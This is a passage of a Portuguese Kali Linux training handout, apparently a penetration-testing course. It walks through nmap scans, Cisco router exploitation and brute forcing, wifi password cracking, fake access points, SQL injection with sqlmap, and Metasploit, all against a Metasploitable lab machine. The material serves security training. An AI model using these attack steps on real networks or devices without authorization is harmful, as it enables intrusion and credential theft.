Logo Passei Direto
Buscar
Material
páginas com resultados encontrados.
páginas com resultados encontrados.
left-side-bubbles-backgroundright-side-bubbles-background

Crie sua conta grátis para liberar esse material. 🤩

Já tem uma conta?

Ao continuar, você aceita os Termos de Uso e Política de Privacidade

left-side-bubbles-backgroundright-side-bubbles-background

Crie sua conta grátis para liberar esse material. 🤩

Já tem uma conta?

Ao continuar, você aceita os Termos de Uso e Política de Privacidade

left-side-bubbles-backgroundright-side-bubbles-background

Crie sua conta grátis para liberar esse material. 🤩

Já tem uma conta?

Ao continuar, você aceita os Termos de Uso e Política de Privacidade

left-side-bubbles-backgroundright-side-bubbles-background

Crie sua conta grátis para liberar esse material. 🤩

Já tem uma conta?

Ao continuar, você aceita os Termos de Uso e Política de Privacidade

left-side-bubbles-backgroundright-side-bubbles-background

Crie sua conta grátis para liberar esse material. 🤩

Já tem uma conta?

Ao continuar, você aceita os Termos de Uso e Política de Privacidade

left-side-bubbles-backgroundright-side-bubbles-background

Crie sua conta grátis para liberar esse material. 🤩

Já tem uma conta?

Ao continuar, você aceita os Termos de Uso e Política de Privacidade

left-side-bubbles-backgroundright-side-bubbles-background

Crie sua conta grátis para liberar esse material. 🤩

Já tem uma conta?

Ao continuar, você aceita os Termos de Uso e Política de Privacidade

left-side-bubbles-backgroundright-side-bubbles-background

Crie sua conta grátis para liberar esse material. 🤩

Já tem uma conta?

Ao continuar, você aceita os Termos de Uso e Política de Privacidade

left-side-bubbles-backgroundright-side-bubbles-background

Crie sua conta grátis para liberar esse material. 🤩

Já tem uma conta?

Ao continuar, você aceita os Termos de Uso e Política de Privacidade

left-side-bubbles-backgroundright-side-bubbles-background

Crie sua conta grátis para liberar esse material. 🤩

Já tem uma conta?

Ao continuar, você aceita os Termos de Uso e Política de Privacidade

Prévia do material em texto

AULA 03 
Kali Linux 
Por Luiz Alvarenga 
 
 
 
 
 
 
 
Sumário 
Kali Linux - Instalação e configuração ........................................................................................... 5 
Baixe e instale a caixa virtual ............................................................................................... 5 
Instale o Kali Linux ................................................................................................................. 9 
Atualização ............................................................................................................................ 12 
Configuração do laboratório ............................................................................................... 14 
Kali Linux - Ferramentas de coleta de informações .................................................................... 18 
NMAP e ZenMAP ................................................................................................................. 18 
Stealth Scan .......................................................................................................................... 20 
Exploração de pesquisa ...................................................................................................... 22 
Ferramentas DNS ................................................................................................................. 23 
dnsenum.pl ........................................................................................................................ 23 
DNSMAP ............................................................................................................................ 25 
dnstracer ............................................................................................................................ 26 
Ferramentas LBD ................................................................................................................. 26 
Hping3 .................................................................................................................................... 27 
Kali Linux - Ferramentas de Análise de Vulnerabilidade ............................................................. 29 
Ferramentas Cisco ............................................................................................................... 29 
Ferramenta de auditoria da Cisco...................................................................................... 30 
Exploração global da Cisco ................................................................................................ 31 
CAMA ..................................................................................................................................... 31 
Kali Linux - Ataques sem fio ........................................................................................................ 33 
Fern Wifi Cracker .................................................................................................................. 33 
Kismet..................................................................................................................................... 38 
GISKismet .............................................................................................................................. 43 
Ghost Phisher ....................................................................................................................... 45 
Wifite ....................................................................................................................................... 47 
Linux Linux - Teste de penetração de sites ................................................................................. 49 
Uso Vega ............................................................................................................................... 49 
ZapProxy ................................................................................................................................ 56 
Uso das Ferramentas de Banco de Dados ...................................................................... 62 
sqlmap ................................................................................................................................ 62 
sqlninja ............................................................................................................................... 64 
Ferramentas de digitalização CMS .................................................................................... 65 
WPScan ............................................................................................................................. 65 
Joomscan ........................................................................................................................... 68 
Ferramentas de digitalização SSL ..................................................................................... 69 
w3af ........................................................................................................................................ 71 
Kali Linux - Ferramentas de exploração ...................................................................................... 73 
Metasploit............................................................................................................................... 73 
Armitage ................................................................................................................................. 77 
Carne ...................................................................................................................................... 80 
Sugeridor de exploração do Linux ..................................................................................... 82 
Kali Linux - Ferramentas forenses ............................................................................................... 83 
p0f ........................................................................................................................................... 83 
analisador de pdf .................................................................................................................. 85 
Dumpzilla ............................................................................................................................... 85 
ddrescue ............................................................................................................................ 86 
DFF ......................................................................................................................................... 86 
Linux Linux - Engenharia Social ................................................................................................... 88 
Uso do Social Engineering Toolkit ..................................................................................... 88 
Kali Linux - Ferramentas de estresse ........................................................................................... 94 
Slowhttptest ........................................................................................................................... 95 
Inviteflood............................................................................................................................... 97 
Ixxflood ................................................................................................................................... 98 
thc-ssl-dos ............................................................................................................................. 99 
Kali Linux - Sniffing & Spoofing .................................................................................................. 100 
Burpsuite .............................................................................................................................. 100 
mitmproxi ............................................................................................................................. 104 
Wireshark .............................................................................................................................105 
sslstrip .................................................................................................................................. 108 
Kali Linux - Ferramentas de quebra de senha ........................................................................... 109 
Hidra ..................................................................................................................................... 109 
Johnny .................................................................................................................................. 111 
John ...................................................................................................................................... 114 
Rainbowcrack ...................................................................................................................... 115 
SQLdict................................................................................................................................. 115 
identificador de hash .......................................................................................................... 116 
Kali Linux - Mantendo o acesso ................................................................................................. 117 
Powersploit .......................................................................................................................... 117 
Sbd ........................................................................................................................................ 118 
Webshells ............................................................................................................................ 119 
Weevely ............................................................................................................................... 120 
túnel http .............................................................................................................................. 122 
dns2tcp ................................................................................................................................. 122 
cryptcat ................................................................................................................................. 123 
Kali Linux - Engenharia Reversa ................................................................................................. 123 
OllyDbg................................................................................................................................. 124 
dex2jar .................................................................................................................................. 125 
jd-gui ..................................................................................................................................... 126 
apktool .................................................................................................................................. 127 
Kali Linux - Ferramentas de Relatório ....................................................................................... 127 
drade..................................................................................................................................... 128 
Metagoofil ............................................................................................................................ 130 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Kali Linux - Instalação e configuração 
O Kali Linux é um dos melhores pacotes de segurança de um hacker ético, 
contendo um conjunto de ferramentas divididas pelas categorias. É um código 
aberto e sua página oficial é https://www.kali.org. 
Geralmente, o Kali Linux pode ser instalado em uma máquina como um sistema 
operacional, como uma máquina virtual que discutiremos na seção a 
seguir. Instalar o Kali Linux é uma opção prática, pois fornece mais opções para 
trabalhar e combinar as ferramentas. Você também pode criar um CD de 
inicialização ao vivo ou USB. Tudo isso pode ser encontrado no seguinte 
link: https://www.kali.org/downloads/ 
BackTrack era a versão antiga da distribuição Kali Linux. A versão mais 
recente é o Kali 2016.1 e é atualizada com muita frequência. 
 
Para instalar o Kali Linux - 
 Primeiro, vamos baixar a caixa Virtual e instalá-la. 
 Mais tarde, baixaremos e instalaremos a distribuição do Kali Linux. 
Baixe e instale a caixa virtual 
Um Virtual Box é particularmente útil quando você deseja testar algo no Kali 
Linux do qual não tem certeza. A execução do Kali Linux em uma caixa virtual 
é segura quando você deseja experimentar pacotes desconhecidos ou quando 
deseja testar um código. 
Com a ajuda de um Virtual Box, você pode instalar o Kali Linux no seu sistema 
(não diretamente no disco rígido) junto com o sistema operacional principal, que 
pode MAC ou Windows ou outro sabor do Linux. 
Vamos entender como você pode baixar e instalar a Caixa Virtual no seu 
sistema. 
https://www.kali.org/
https://www.kali.org/downloads/
Etapa 1 - Para fazer o download, 
acesse https://www.virtualbox.org/wiki/Downloads . Dependendo do seu 
sistema operacional, selecione o pacote certo. Nesse caso, será o primeiro para 
Windows, como mostra a captura de tela a seguir. 
 
Etapa 2 - Clique em Avançar . 
 
Etapa 3 - A próxima página oferece opções para escolher o local em que você 
deseja instalar o aplicativo. Nesse caso, deixe-o como padrão e clique 
em Avançar . 
https://www.virtualbox.org/wiki/Downloads
 
Etapa 4 - Clique em Avançar e a seguinte captura de tela da Instalação 
personalizada será exibida. Selecione os recursos que você deseja instalar e 
clique em Avançar. 
 
Etapa 5 - Clique em Sim para continuar com a instalação. 
 
Etapa 6 - A tela Pronto para instalar é exibida. Clique em instalar. 
 
Etapa 7 - Clique no botão Concluir . 
 
O aplicativo Virtual Box agora será aberto como mostrado na captura de tela a 
seguir. Agora estamos prontos para instalar o restante dos hosts deste manual 
e isso também é recomendado para uso profissional. 
 
Instale o Kali Linux 
Agora que instalamos com sucesso o Virtual Box, vamos para a próxima etapa 
e instale o Kali Linux. 
Etapa 1 - Faça o download do pacote Kali Linux em seu site 
oficial: https://www.kali.org/downloads/ 
https://www.kali.org/downloads/
 
Etapa 2 - Clique em VirtualBox → Novo, como mostrado na captura de tela a 
seguir. 
 
Etapa 3 - Escolha o arquivo de disco rígido virtual certo e clique em Abrir . 
 
Etapa 4 - A seguinte captura de tela é exibida. Clique no botão Criar . 
 
Etapa 5 - Inicie o Kali OS. O nome de usuário padrão é root e a senha é toor . 
 
Atualização 
É importante continuar atualizando o Kali Linux e suas ferramentas para as 
novas versões, para permanecer funcional. A seguir estão as etapas para 
atualizar o Kali. 
Etapa 1 - Vá para Aplicativo → Terminal. Em seguida, digite "apt-get update" e 
a atualização ocorrerá como mostrado na captura de tela a seguir. 
 
 
Etapa 2 - Agora, para atualizar as ferramentas, digite "apt-get upgrade" e os 
novos pacotes serão baixados. 
 
Etapa 3 - Ele perguntará se você deseja continuar. Digite "Y" e "Enter" . 
 
Etapa 4 - Para atualizar para uma versão mais recente do sistema operacional, 
digite "apt-get distupgrade" . 
 
Configuração do laboratório 
Nesta seção, configuraremos outra máquina de teste para executar os testes 
com a ajuda das ferramentas do Kali Linux. 
Etapa 1 - Faça o download do Metasploitable , que é uma máquina 
Linux. Pode ser baixado da página oficial 
do Rapid7 : https://information.rapid7.com/metasploitabledownload.html?LS=1
631875&CS=web 
https://information.rapid7.com/metasploitable-download.html?LS=1631875&CS=web
https://information.rapid7.com/metasploitable-download.html?LS=1631875&CS=web
 
Etapa 2 - Registre-se fornecendo seus dados. Depois de preencher o formulário 
acima, podemos fazer o download do software. 
 
Etapa 3 - Clique em VirtualBox → Novo . 
 
Etapa4 - Clique em "Usar um arquivo de disco rígido virtual 
existente" . Procure o arquivo em que você baixou o Metasploitable e clique 
em Abrir . 
 
Etapa 5 - Uma tela para criar uma máquina virtual é exibida. Clique em "Criar". 
 
O nome de usuário padrão é msfadmin e a senha é msfadmin . 
 
Kali Linux - Ferramentas de coleta de 
informações 
Neste capítulo, discutiremos as ferramentas de coleta de informações do Kali 
Linux. 
NMAP e ZenMAP 
NMAP e ZenMAP são ferramentas úteis para a fase de varredura do Ethical 
Hacking no Kali Linux. O NMAP e o ZenMAP são praticamente a mesma 
ferramenta, no entanto, o NMAP usa a linha de comando enquanto o ZenMAP 
tem uma GUI. 
O NMAP é uma ferramenta gratuita para descoberta de rede e auditoria de 
segurança. Muitos sistemas e administradores de rede também o consideram 
útil para tarefas como inventário de rede, gerenciamento de agendas de 
atualização de serviço e monitoramento do tempo de atividade do host ou 
serviço. 
O NMAP usa pacotes IP brutos de maneiras inovadoras para determinar quais 
hosts estão disponíveis na rede, quais serviços (nome e versão do aplicativo) 
esses hosts estão oferecendo, quais sistemas operacionais (e versões do SO) 
eles estão executando, que tipo de filtro / firewall de pacote estão em uso etc. 
Agora, vamos passo a passo e aprendemos a usar o NMAP e o ZenMAP. 
Etapa 1 - Para abrir, vá para Aplicativos → 01-Coleta de informações → nmap 
ou zenmap. 
 
Etapa 2 - A próxima etapa é detectar o tipo / versão do SO do host de 
destino. Com base na ajuda indicada pelo NMAP, o parâmetro de detecção do 
tipo / versão do SO é variável "-O". Para mais informações, use este 
link: https://nmap.org/book/man-os-detection.html 
O comando que vamos usar é - 
nmap -O 192.168.1.101 
A captura de tela a seguir mostra onde você precisa digitar o comando acima 
para ver a saída do Nmap - 
 
Etapa 3 - Em seguida, abra as portas TCP e UDP. Para verificar todas as portas 
TCP baseadas no NMAP, use o seguinte comando - 
https://nmap.org/book/man-os-detection.html
nmap -p 1-65535 -T4 192.168.1.101 
Onde o parâmetro “–p” indica todas as portas TCP que precisam ser 
verificadas. Nesse caso, estamos analisando todas as portas e "-T4" é a 
velocidade da verificação na qual o NMAP deve ser executado. 
A seguir estão os resultados. Em verde estão todas as portas abertas do TCP 
e em vermelho estão todas as portas fechadas. No entanto, o NMAP não 
aparece, pois a lista é muito longa. 
 
Stealth Scan 
A varredura furtiva ou SYN também é conhecida como varredura semiaberta , 
pois não conclui o handshake de três vias do TCP. Um hacker envia um pacote 
SYN para o destino; se um quadro SYN / ACK for recebido de volta, presume-
se que o destino conclua a conexão e a porta esteja escutando. Se um RST for 
recebido de volta do destino, será assumido que a porta não está ativa ou está 
fechada. 
 
 
Agora, para ver a varredura SYN na prática, use o parâmetro –sS no NMAP. A 
seguir está o comando completo - 
nmap -sS -T4 192.168.1.101 
A captura de tela a seguir mostra como usar este comando - 
 
Exploração de pesquisa 
O Searchsploit é uma ferramenta que ajuda os usuários do Kali Linux a 
pesquisar diretamente com a linha de comando do arquivo de banco de dados 
do Exploit. 
Para abri-lo, vá para Aplicativos → 08-Exploitation Tools → searchsploit, 
conforme mostrado na captura de tela a seguir. 
 
Após abrir o terminal, digite " searchsploit exploit index name ". 
 
Ferramentas DNS 
Nesta seção, aprenderemos como usar algumas ferramentas de DNS que o Kali 
incorporou. Basicamente, essas ferramentas ajudam nas transferências de 
zona ou nos problemas de resolução de IP do domínio. 
dnsenum.pl 
A primeira ferramenta é o dnsenum.pl, que é um script PERL que ajuda a 
conectar MX, A e outros registros a um domínio. 
Clique no terminal no painel esquerdo. 
 
Digite “nome de domínio dnsenum” e todos os registros serão 
mostrados. Nesse caso, mostra os registros A. 
 
DNSMAP 
A segunda ferramenta é o DNSMAP, que ajuda a encontrar os números de 
telefone, contatos e outros subdomínios conectados a esse domínio que 
estamos pesquisando. A seguir está um exemplo. 
Clique no terminal como na seção superior e, em seguida, escreva "dnsmap 
domain name" 
 
dnstracer 
A terceira ferramenta é o dnstracer , que determina de onde um determinado 
DNS (Servidor de Nomes de Domínio) obtém suas informações para um 
determinado nome de host. 
Clique no terminal como na seção superior e digite "dnstracer domain name" . 
 
Ferramentas LBD 
As ferramentas LBD (Detector de balanceamento de carga) são muito 
interessantes, pois detectam se um determinado domínio usa DNS e / ou 
HTTP. É importante porque se você possui dois servidores, um ou outro pode 
não ser atualizado e você pode tentar explorá-lo. A seguir estão as etapas para 
usá-lo - 
Primeiro, clique no terminal no painel esquerdo. 
 
Em seguida, digite "lbd domainname" . Se produzir um resultado como 
"ENCONTRADO", significa que o servidor possui um equilíbrio de carga. Nesse 
caso, o resultado é "NÃO ENCONTRADO". 
 
Hping3 
O Hping3 é amplamente utilizado por hackers éticos. É quase semelhante às 
ferramentas de ping, mas é mais avançado, pois pode ignorar o filtro do firewall 
e usar os protocolos TCP, UDP, ICMP e RAW-IP. Possui um modo de 
traceroute e a capacidade de enviar arquivos entre um canal coberto. 
Clique no terminal no painel esquerdo. 
 
Digite “hping3 –h” que mostrará como usar este comando. 
 
O outro comando é "domínio hping3 ou parâmetro de IP" 
 
Kali Linux - Ferramentas de Análise de 
Vulnerabilidade 
Neste capítulo, aprenderemos como usar algumas das ferramentas que nos 
ajudam a explorar dispositivos ou aplicativos para obter acesso. 
Ferramentas Cisco 
O Kali possui algumas ferramentas que podem ser usadas para explorar o 
roteador Cisco. Uma dessas ferramentas é a tocha Cisco, usada para 
digitalização em massa, impressão digital e exploração. 
Vamos abrir o console do Terminal clicando no painel esquerdo. 
 
Em seguida, digite “cisco-torch –parameter IP of host” e, se não houver nada 
a explorar, o seguinte resultado será mostrado. 
 
Para ver quais são os parâmetros que podem ser usados, digite "cisco-torch?" 
 
Ferramenta de auditoria da Cisco 
É um script PERL, que verifica os roteadores Cisco em busca de 
vulnerabilidades comuns. Para usá-lo, abra novamente o terminal no painel 
esquerdo, como mostrado na seção anterior, e digite “CAT –h hostname ou 
IP” . 
Você pode adicionar o parâmetro da porta "-p", como mostrado na captura de 
tela a seguir, que neste caso é 23 para forçá-lo com força bruta. 
 
Exploração global da Cisco 
O Cisco Global Exploiter (CGE) é uma ferramenta de teste de segurança 
avançada, simples e rápida. Com essas ferramentas, você pode executar vários 
tipos de ataques, conforme mostrado na captura de tela a seguir. No entanto, 
tenha cuidado ao testar em um ambiente ativo, pois alguns deles podem travar 
o dispositivo da Cisco. Por exemplo, a opção pode parar os serviços. 
 
Para usar esta ferramenta, digite "cge.pl IPaddress number of vulnerability" 
A captura de tela a seguir mostra o resultado do teste realizado no roteador 
Cisco para a vulnerabilidade número 3 da lista acima. O resultado mostra que 
a vulnerabilidade foi explorada com sucesso. 
 
CAMA 
O BED é um programa projetado para verificar daemons quanto a possíveis 
estouros de buffer, strings de formato, etc. al. 
 
Nesse caso, testaremos a máquina de teste com IP 192.168.1.102 e o protocolo 
HTTP. 
O comando será "HTTP da cama - t 192.168.1.102" e o teste continuará. 
 
Kali Linux - Ataques sem fio 
Neste capítulo, aprenderemos como usar as ferramentas de cracking de Wi-Fi 
que o Kali Linux incorporou. No entanto, é importante que a placa sem fio que 
você possui seja um modo de monitoramento de suporte. 
Fern Wifi Cracker 
O cracker Fern Wifi é uma das ferramentas que o Kali precisa quebrarsem fio. 
Antes de abrir o Fern, devemos transformar a placa sem fio no modo de 
monitoramento. Para fazer isso, digite “airmon-ng start wlan-0” no terminal. 
 
Agora, abra o Fern Wireless Cracker. 
Etapa 1 - Aplicativos → Clique em "Ataques sem fio" → "Fern Wireless 
Cracker". 
 
Etapa 2 - Selecione a placa Wireless, conforme mostrado na captura de tela a 
seguir. 
 
Etapa 3 - Clique em "Procurar pontos de acesso". 
 
Etapa 4 - Após concluir a verificação, ele mostrará todas as redes sem fio 
encontradas. Nesse caso, apenas "redes WPA" foram encontradas. 
 
Etapa 5 - Clique em redes WPA, como mostrado na captura de tela acima. Ele 
mostra todos os dispositivos sem fio encontrados. Geralmente, em redes WPA, 
ele executa ataques de dicionário como tal. 
Etapa 6 - Clique em "Procurar" e encontre a lista de palavras a ser usada para 
o ataque. 
 
Passo 7 - Clique em "Wifi Attack". 
 
Etapa 8 - Depois de finalizar o ataque do dicionário, encontrou a senha e será 
mostrada na imagem a seguir. 
 
Kismet 
Kismet é uma ferramenta de análise de rede Wi-Fi. É um sistema de detecção 
de rede sem fio, sniffer e detecção de intrusões 802.11 de camada 2. Ele 
funcionará com qualquer placa sem fio que suporte o modo de monitoramento 
bruto (rfmon) e pode detectar o tráfego 802.11a / b / g / n. Ele identifica as redes 
coletando pacotes e também redes ocultas. 
Para usá-lo, coloque a placa wireless no modo de monitoramento e, para isso, 
digite “airmon-ng start wlan-0” no terminal. 
 
Vamos aprender a usar essa ferramenta. 
Etapa 1 - Para iniciá-lo, abra o terminal e digite "kismet". 
 
Etapa 2 - Clique em "OK". 
 
Etapa 3 - Clique em "Sim" quando pedir para iniciar o Kismet Server. Caso 
contrário, ele irá parar de funcionar. 
 
Etapa 4 - Opções de inicialização, deixe como padrão. Clique em "Iniciar". 
 
Etapa 5 - Agora, será exibida uma tabela solicitando que você defina a placa 
sem fio. Nesse caso, clique em Sim. 
 
Etapa 6 - Nesse caso, a fonte sem fio é "wlan0" . Terá que ser escrito na 
seção "Intf" → clique em "Adicionar". 
 
Etapa 7 - Ele começará a cheirar as redes wifi, como mostrado na captura de 
tela a seguir. 
 
Etapa 8 - Clique em qualquer rede, produz os detalhes da conexão sem fio, 
conforme mostrado na captura de tela a seguir. 
 
GISKismet 
O GISKismet é uma ferramenta de visualização sem fio para representar dados 
coletados usando o Kismet de maneira prática. O GISKismet armazena as 
informações em um banco de dados para que possamos consultar dados e 
gerar gráficos usando SQL. Atualmente, o GISKismet usa SQLite para o banco 
de dados e arquivos GoogleEarth / KML para gráficos. 
Vamos aprender a usar essa ferramenta. 
Etapa 1 - Para abrir o GISKismet, vá para: Aplicativos → Clique em "Ataques 
sem fio" → giskismet. 
 
Como você se lembra na seção anterior, usamos a ferramenta Kismet para 
explorar dados sobre redes sem fio e todos esses pacotes de dados Kismet em 
arquivos netXML. 
Etapa 2 - Para importar esse arquivo para o Giskismet, digite "root @ kali: ~ # 
giskismet -x Kismetfilename.netxml" e ele começará a importar os arquivos. 
 
Depois de importados, podemos importá-los para o Google Earth, os Hotspots 
que encontramos anteriormente. 
Etapa 3 - Supondo que já instalamos o Google Earth, clique em Arquivo → Abrir 
arquivo que o Giskismet criou → Clique em “Abrir”. 
 
O mapa a seguir será exibido. 
 
Ghost Phisher 
O Ghost Phisher é uma ferramenta popular que ajuda a criar pontos de acesso 
sem fio falsos e, posteriormente, a criar o ataque do homem-no-meio. 
Etapa 1 - Para abri-lo, clique em Aplicativos → Ataques sem fio → "phishing 
fantasma". 
 
Etapa 2 - Após a abertura, configuraremos o PA falso usando os seguintes 
detalhes. 
 Entrada de interface sem fio: wlan0 
 SSID: nome do ponto de acesso sem fio 
 Endereço IP: IP que o AP terá 
 WAP: senha que terá esse SSID para conectar 
 
Etapa 3 - Clique no botão Iniciar . 
Wifite 
É outra ferramenta de clacking sem fio, que ataca várias redes criptografadas 
WEP, WPA e WPS seguidas. 
Em primeiro lugar, a placa sem fio deve estar no modo de monitoramento. 
Etapa 1 - Para abri-lo, vá para Aplicativos → Ataque sem fio → Wifite. 
 
Etapa 2 - Digite "wifite –showb" para procurar as redes. 
 
 
Etapa 3 - Para começar a atacar as redes sem fio, clique em Ctrl + C. 
 
Etapa 4 - Digite "1" para quebrar a primeira conexão sem fio. 
 
Etapa 5 - Após a conclusão do ataque, a chave será encontrada. 
 
Linux Linux - Teste de penetração de sites 
Neste capítulo, aprenderemos sobre os testes de penetração de sites 
oferecidos pelo Kali Linux. 
Uso Vega 
O Vega é um scanner de código aberto e gratuito e uma plataforma de teste 
para testar a segurança de aplicativos da web. A Vega pode ajudá-lo a 
encontrar e validar Injeção de SQL, XSS (Cross-Site Scripting), informações 
confidenciais divulgadas inadvertidamente e outras vulnerabilidades. É escrito 
em Java, baseado em GUI e executado no Linux, OS X e Windows. 
O Vega inclui um scanner automatizado para testes rápidos e um proxy 
interceptador para inspeção tática. O Vega pode ser estendido usando uma API 
poderosa no idioma da web: JavaScript. A página oficial 
é https://subgraph.com/vega/ 
 
Etapa 1 - Para abrir o Vega, vá para Aplicativos → 03-Web Application Analysis 
→ Vega 
 
Etapa 2 - Se você não vir um aplicativo no caminho, digite o seguinte comando. 
 
Etapa 3 - Para iniciar uma verificação, clique no sinal "+". 
https://subgraph.com/vega/
 
Etapa 4 - Digite o URL da página da web que será digitalizada. Nesse caso, é 
uma máquina metaploploável → clique em “Avançar”. 
 
Etapa 5 - Marque todas as caixas dos módulos que você deseja 
controlar. Depois, clique em "Next". 
 
Etapa 6 - Clique em "Avançar" novamente na captura de tela a seguir. 
 
Etapa 7 - Clique em "Concluir". 
 
Etapa 8 - Se a seguinte tabela aparecer, clique em "Sim". 
 
A verificação continuará como mostrado na captura de tela a seguir. 
 
Etapa 9 - Após a conclusão da verificação, no painel esquerdo, você poderá ver 
todas as descobertas categorizadas de acordo com a gravidade. Se você clicar 
nele, verá todos os detalhes das vulnerabilidades no painel direito, como 
"Solicitação", "Discussão", "Impacto" e "Remediação". 
 
ZapProxy 
O ZAP-OWASP Zed Attack Proxy é uma ferramenta de teste de penetração 
integrada fácil de usar para encontrar vulnerabilidades em aplicativos da web. É 
uma interface Java. 
Etapa 1 - Para abrir o ZapProxy, vá para Aplicativos → 03-Web Application 
Analysis → owaspzap. 
 
Etapa 2 - Clique em "Aceitar". 
 
O ZAP começará a carregar. 
 
Etapa 3 - Escolha uma das opções conforme mostrado na captura de tela a 
seguir e clique em "Iniciar". 
 
A web a seguir é metaploplo com IP: 192.168.1.101 
 
Etapa 4 - Digite o URL da web de teste em “URL to attack” → clique em “Attack”. 
 
Após a conclusão da verificação, no painel superior esquerdo, você verá todos 
os sites rastreados. 
No painel esquerdo "Alertas", você verá todas as descobertas junto com a 
descrição. 
 
Passo 5 - Clique em "Spider" e você verá todos os links verificados. 
 
Uso das Ferramentas de Banco de Dados 
sqlmap 
O sqlmap é uma ferramenta de teste de penetração de código aberto que 
automatiza o processo de detecção e exploração de falhas de injeção de SQL 
e a tomada de controle de servidores de banco de dados. Ele vem com um 
poderoso mecanismo de detecção, muitos recursos de nicho para o testador de 
penetração final e uma ampla variedade de opções que duram desde 
impressões digitais do banco de dados, busca de dados no banco de dados, 
acesso ao sistema de arquivos subjacente e execução de comandos no sistema 
operacional via conexões de banda. 
Vamos aprender a usar o sqlmap. 
Etapa 1 - Para abrir o sqlmap, vá para Aplicativos → 04-Database Assessment 
→ sqlmap. 
 
A página da Web que possui parâmetros vulneráveis à injeção de SQL é meta-explorável. 
 
Etapa 2 - Para iniciar o teste de injeção de sql, digite "sqlmap - u URL da 
vítima" 
 
Etapa 3 - A partir dos resultados, você verá que algumas variáveis são 
vulneráveis. 
 
sqlninja 
sqlninja é uma injeção de SQL no Microsoft SQL Server para um acesso GUI 
completo. O sqlninja é uma ferramenta direcionada para explorar as 
vulnerabilidades de injeção do SQL em um aplicativo Web que usa o Microsoft 
SQL Server como back-end. Informações completas sobre esta ferramenta 
podem ser encontradas em http://sqlninja.sourceforge.net/ 
Etapa 1 - Para abrir o sqlninja, vá para Aplicativos → 04-Database Assesment 
→ sqlninja. 
http://sqlninja.sourceforge.net/
 
Ferramentas de digitalização CMS 
WPScan 
O WPScan é um scanner de vulnerabilidades do WordPress que pode ser 
usado para verificar instalações remotas do WordPress e encontrar problemas 
de segurança. 
Etapa 1 - Para abrir o WPscan, vá para Aplicativos → 03-Web Application 
Analysis → “wpscan”. 
 
A captura de tela a seguir é exibida. 
 
Etapa 2 - Para verificar vulnerabilidades em um site, digite "wpscan –u URL 
da página da web" . 
Se o scanner não for atualizado, ele solicitará a atualização. Eu recomendo 
fazê-lo. 
 
Depois que a verificação iniciar, você verá as descobertas. Na captura de tela 
a seguir, as vulnerabilidades são indicadas por uma seta vermelha. 
 
 
Joomscan 
O Joomla é provavelmente o CMS mais usado no mercado devido à sua 
flexibilidade. Para este CMS, é um scanner Joomla. Isso ajudará os 
desenvolvedores e mestres da web a identificar possíveis falhas de segurança 
em seus sites Joomla implantados. 
Passo 1 - Para abri-lo, basta clicar no painel esquerdo no terminal e, em 
seguida, em "joomscan - parameter" . 
Etapa 2 - Para obter ajuda para o tipo de uso "joomscan /?" 
 
Etapa 3 - Para iniciar a verificação, digite “joomscan –u URL da vítima”. 
 
Os resultados serão exibidos como mostrado na captura de tela a seguir. 
 
 
Ferramentas de digitalização SSL 
TLSSLed é um script de shell do Linux usado para avaliar a segurança de uma 
implementação de servidor da Web SSL / TLS (HTTPS) de destino. Ele é 
baseado no sslscan, um completo scanner SSL / TLS baseado na biblioteca 
openssl e na ferramenta de linha de comando "openssl s_client" . 
Os testes atuais incluem a verificação se o destino suporta o protocolo SSLv2, 
a codificação NULL, cifras fracas com base no comprimento da chave (40 ou 56 
bits), a disponibilidade de cifras fortes (como AES), se o certificado digital é 
assinado MD5 e os recursos atuais de renegociação SSL / TLS. 
Para iniciar o teste, abra um terminal e digite "tlssled URL port" . Ele começará 
a testar o certificado para encontrar dados. 
 
Você pode ver pela conclusão de que o certificado é válido até 2018, conforme 
mostrado em verde na captura de tela a seguir. 
 
w3af 
O w3af é uma estrutura de ataque e auditoria de aplicativos da Web que visa 
identificar e explorar todas as vulnerabilidades de aplicativos da web. Este 
pacote fornece uma interface gráfica do usuário (GUI) para a estrutura. Se você 
deseja apenas um aplicativo de linha de comando, instale o w3af-console. 
A estrutura foi chamada de "metaploit for the web", mas na verdade é muito 
mais, pois também descobre as vulnerabilidades de aplicativos da web usando 
técnicas de verificação de caixa preta. O núcleo do w3af e seus plugins são 
totalmente escritos em Python. O projeto possui mais de 130 plug-ins, que 
identificam e exploram a injeção de SQL, XSS (cross-site scripting), inclusão 
remota de arquivos e muito mais. 
Etapa 1 - Para abri-lo, vá para Aplicativos → 03-Web Application Analysis → 
Clique em w3af. 
 
Etapa 2 - No "Alvo", digite o URL da vítima, que neste caso será o endereço da 
web metaploplo. 
 
Passo 3 - Selecione o perfil → Clique em "Iniciar". 
 
Etapa 4 - Vá para "Resultados" e você pode ver a descoberta com os detalhes. 
 
Kali Linux - Ferramentas de exploração 
Neste capítulo, aprenderemos sobre as várias ferramentas de exploração 
oferecidas pelo Kali Linux. 
Metasploit 
Como mencionamos anteriormente, o Metasploit é um produto do Rapid7 e a 
maioria dos recursos pode ser encontrada na 
página www.metasploit.com . Está disponível em duas versões - edição 
comercial e gratuita. As diferenças entre essas duas versões não são grandes, 
portanto, neste caso, usaremos a versão comunitária (gratuita). 
Como um hacker ético, você usará o "Kali Ditribution", que possui a versão da 
comunidade Metasploit incorporada, juntamente com outras ferramentas de 
hackers éticas que são muito confortáveis, economizando tempo de 
instalação. No entanto, se você deseja instalar como uma ferramenta separada, 
é um aplicativo que pode ser instalado nos sistemas operacionais como Linux, 
Windows e OS X. 
Primeiro, abra o Metasploit Console no Kali. Em seguida, vá para Aplicativos → 
Ferramentas de exploração → Metasploit. 
https://www.metasploit.com./
 
Após o início, você verá a seguinte tela, onde a versão do Metasploit está 
sublinhada em vermelho. 
 
No console, se você usa ajuda ou? símbolo, ele mostrará uma lista com os 
comandos do MSP e sua descrição. Você pode escolher com base em suas 
necessidades e no que usará. 
 
Outro comando de administração importante é o msfupdate, que ajuda a 
atualizar o metasploit com as mais recentes explorações de 
vulnerabilidades. Depois de executar este comando no console, você terá que 
esperar alguns minutos até que a atualização seja concluída. 
 
Ele possui um bom comando chamado "Pesquisar", que você pode usar para 
encontrar o que deseja, conforme mostrado na captura de tela a seguir. Por 
exemplo, desejo encontrar explorações relacionadas à Microsoft e o comando 
pode ser msf> search name: Microsoft type: exploit . 
Onde "pesquisar" é o comando, "nome" é o nome do objeto que estamos 
procurando e "tipo" é o tipo de script que estamos procurando. 
 
Outro comando é "info". Ele fornece as informações sobre um módulo ou 
plataforma em que é usado, quem é o autor, a referência de vulnerabilidade e 
a restrição de carga útil que isso pode ter. 
 
Armitage 
A interface gráfica do usuário Armitage para metasploit é uma ferramenta 
complementar para o metasploit. Ele visualiza destinos, recomenda 
